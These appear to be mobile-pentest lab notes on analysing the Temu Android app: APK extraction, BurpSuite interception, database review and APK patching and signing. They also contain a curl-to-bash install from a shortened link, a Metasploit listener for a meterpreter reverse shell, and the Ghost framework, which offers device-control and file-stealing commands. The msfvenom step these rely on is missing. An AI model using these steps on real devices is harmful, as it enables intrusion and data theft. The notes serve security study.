Install the Temu app from the Android Play Store (package name: com.einnovation.temu)

```bash
frida-ps -Uai | grep temu
Temu  com.einnovation.temu
```
Pull apk from the phone
```bash
cd ~/tcm/mapt/temu
adb shell pm list packages | grep temu
adb shell pm path com.einnovation.temu
adb pull /data/app/com.einnovation.temu-RKERNRo1SuGOM3UEbNeFIA==/base.apk
adb pull /data/app/com.einnovation.temu-RKERNRo1SuGOM3UEbNeFIA==/split_config.arm64_v8a.apk
adb pull /data/app/com.einnovation.temu-RKERNRo1SuGOM3UEbNeFIA==/split_config.xhdpi.apk

.rw-r--r-- 19M base.apk
.rw-r--r-- 15M split_config.arm64_v8a.apk
.rw-r--r-- 77k split_config.xhdpi.apk

mv base.apk temu.apk

# or use apkpull tool by david-lee
curl -sL bit.ly/apkpull | bash -s -- com.einnovation.temu -d .
```
Check strings.xml for hardcoded strings, databases (Firebase, etc), keys, email, phone numbers, etc.
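One way to automate the strings.xml review described above. This is an added example, not part of the original notes; it assumes the APK has already been decoded (for instance with apktool) so that `res/values/strings.xml` is plain XML, and the pattern set and sample values are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Value patterns worth a manual look (illustrative, not exhaustive).
VALUE_PATTERNS = {
    "firebase_db": re.compile(r"https://[\w-]+\.firebaseio\.com", re.I),
    "google_api_key": re.compile(r"AIza[0-9A-Za-z_-]{35}"),
    "email": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    "phone": re.compile(r"\+?\d[\d\s().-]{8,}\d"),
    "url": re.compile(r"https?://[^\s\"'<>]+", re.I),
}
# Resource names that suggest a credential regardless of the value's shape.
NAME_HINT = re.compile(r"(api[_-]?key|secret|token|passw(or)?d|client[_-]?id)", re.I)


def scan_strings_xml(xml_text):
    """Return sorted (resource_name, finding_type, value) tuples."""
    findings = set()
    root = ET.fromstring(xml_text)
    for node in root.iter("string"):
        name = node.get("name", "")
        value = "".join(node.itertext()).strip()
        if not value:
            continue
        if NAME_HINT.search(name):
            findings.add((name, "suspicious_name", value))
        for kind, pattern in VALUE_PATTERNS.items():
            for match in pattern.finditer(value):
                findings.add((name, kind, match.group(0)))
    return sorted(findings)


# Constructed sample; every value below is fake.
FAKE_KEY = "AIza" + "X" * 35
SAMPLE = f"""<resources>
    <string name="app_name">Demo</string>
    <string name="firebase_database_url">https://demo-app-1234.firebaseio.com</string>
    <string name="google_api_key">{FAKE_KEY}</string>
    <string name="support_contact">Mail help@example.com or call +1 555 010 0199</string>
</resources>"""

if __name__ == "__main__":
    for name, kind, value in scan_strings_xml(SAMPLE):
        print(f"{kind:16} {name:24} {value}")
```

To run it against a real decoded file, pass the file's contents to `scan_strings_xml`; every hit still needs manual confirmation, since many URLs and identifiers in resources are benign.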
Set up BurpSuite with a Proxy listener bound to all interfaces, then set the proxy on the device's network connection (make sure the BurpSuite certificate is installed on the device).

```bash
# Create an alias for set and unset proxy
# Note: $(...) is expanded when the alias is defined, so it captures the eth1 IPv4 address at that moment
alias adbsetproxy="adb shell settings put global http_proxy $(ip -o -4 addr show eth1 | awk '{print $4}' | sed 's/\/.*//g'):8080"
alias adbunsetproxy="adb shell settings put global http_proxy :0"

# Use the created alias to set the proxy
adbsetproxy
```
Navigate the app. It seems certificate pinning is on.
Certificate Pinning bypassed successfully. Traffic is intercepted in BurpSuite.
Navigate the app and check the HTTP history requests.
In Jadx-GUI search for URLs (http, https), API_KEY, Coupons, etc
Check internal storage for sensitive data stored in files, cache, databases, etc.

```bash
adb shell
su
cd /data/data/com.einnovation.temu/

# or open Device Explorer in Android Studio
```
Check for databases
After navigating and interacting with the app, pull interesting db files and check them with SQLite Browser; look through the database tables and structure.

```bash
# e.g.
adb pull /data/data/com.einnovation.temu/databases/google_app_measurement_local.db

# if Permission Denied error use su command like this
adb -d shell "su -c cp /data/data/com.einnovation.temu/databases/google_app_measurement_local.db /sdcard/Download"
adb pull /sdcard/Download/google_app_measurement_local.db

sqlitebrowser google_app_measurement_local.db
```
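A scripted first pass over a pulled database, complementing the manual SQLite Browser review above. This is an added example, not part of the original notes; the sensitive-name list, the helper names and the in-memory sample schema are assumptions constructed for illustration.

```python
import re
import sqlite3

# Column names that usually deserve a closer look (illustrative list).
SENSITIVE = re.compile(r"(token|passw|secret|session|cookie|email|phone|card|auth)", re.I)


def triage_db(conn):
    """Map each table to its row count, columns and sensitive-looking columns."""
    report = {}
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' "
        "AND name NOT LIKE 'sqlite_%' ORDER BY name"
    ).fetchall()
    for (table,) in tables:
        quoted = '"' + table.replace('"', '""') + '"'
        columns = [row[1] for row in conn.execute(f"PRAGMA table_info({quoted})")]
        rows = conn.execute(f"SELECT COUNT(*) FROM {quoted}").fetchone()[0]
        report[table] = {
            "rows": rows,
            "columns": columns,
            "flagged": [c for c in columns if SENSITIVE.search(c)],
        }
    return report


def open_readonly(path):
    """Open a pulled .db file read-only so the copy under analysis is not modified."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def build_sample():
    """Constructed stand-in for a pulled app database; schema and data are fake."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE events (id INTEGER PRIMARY KEY, name TEXT, ts INTEGER);
        CREATE TABLE account (uid TEXT, email TEXT, auth_token TEXT);
        INSERT INTO events (name, ts) VALUES ('app_open', 1), ('view_item', 2);
        INSERT INTO account VALUES ('u1', 'user@example.com', 'FAKE-TOKEN');
    """)
    return conn


if __name__ == "__main__":
    for table, info in triage_db(build_sample()).items():
        print(table, info["rows"], info["columns"], "flagged:", info["flagged"])
```

For a real file, call `triage_db(open_readonly("google_app_measurement_local.db"))` and then inspect the flagged tables by hand.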
Interaction with all the app's functions is important to further analyze the app during dynamic analysis.
Patching APK
patch-apk tool can also be used for identifying the package name, extracting APKs, patching with objection, consolidating split APKs, enabling CA certificates, uninstalling the original app, and installing the patched version.
```bash
# Usage
cd ~/repo
git clone https://github.com/NickstaDB/patch-apk.git
cd ~/repo/patch-apk
apktool empty-framework-dir --force
python3 patch-apk.py com.einnovation.temu

# In case of apktool error
mv ~/.local/share/apktool/framework/1.apk ~/.local/share/apktool/framework/1.apk.bak

# Get a proper framework apk from a device /system/framework
adb pull /system/framework/framework-res.apk
mv framework-res.apk ~/.local/share/apktool/framework/1.apk

# Re-run patch-apk
python3 patch-apk.py com.einnovation.temu
```

```bash
# Create a Keystore
keytool -genkey -v -keystore demo.keystore -alias demokeys -keyalg RSA -keysize 2048 -validity 10000

# Sign the APK
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore demo.keystore -storepass demopw android.apk demokeys

# zipalign the APK
zipalign -v 4 android.apk android_signed.apk
```

```bash
adb install android_signed.apk

# or via network (to device or emulator)
# adb -H 192.168.56.103 -P 5555 install android_signed.apk
```
Open a meterpreter shell and listen for the connection
```bash
msfconsole
use exploit/multi/handler
# set LHOST and LPORT same as in the msfvenom command
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
run
```
🔗 kp-forks/ghost-1 - Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration
```bash
cd ~/repo
git clone https://github.com/kp-forks/ghost-1.git
cd ghost-1
sudo ./install.sh

# Run with
sudo ./ghost
```

To make it work on port 5555, adb must be connected to the device over TCP.

```bash
# Connect device with USB
adb tcpip 5555
adb connect <DEVICE_IP>:5555
adb devices
# Disconnect device USB
```

```bash
# Similar to Metasploit
set RHOST <DEVICE_IP>
options
run
```

```
# Some Ghost commands
Core Commands
=============

    Command        Description
    -------        -----------
    clear          Clear terminal window.
    exec           Execute local system command.
    exit           Exit and close current session.
    help           Show available session commands.

Settings Commands
=================

    Command        Description
    -------        -----------
    activity       Get device activity information.
    battery        Get device battery information.
    netstat        Get device network information.
    sysinfo        Get device system information.
    wifi           Control device wifi service.

Managing Commands
=================

    Command        Description
    -------        -----------
    eatpass        Eat device passcode.
    keyboard       Control target keyboard.
    openurl        Open URL on device.
    screen         Control device screen.
    screenshot     Take device screenshot.
    shell          Open device shell.
    upload         Upload local file.

Stealing Commands
=================

    Command        Description
    -------        -----------
    download       Download remote file.

Boot Commands
=============

    Command        Description
    -------        -----------
    reboot         Reboot device.
```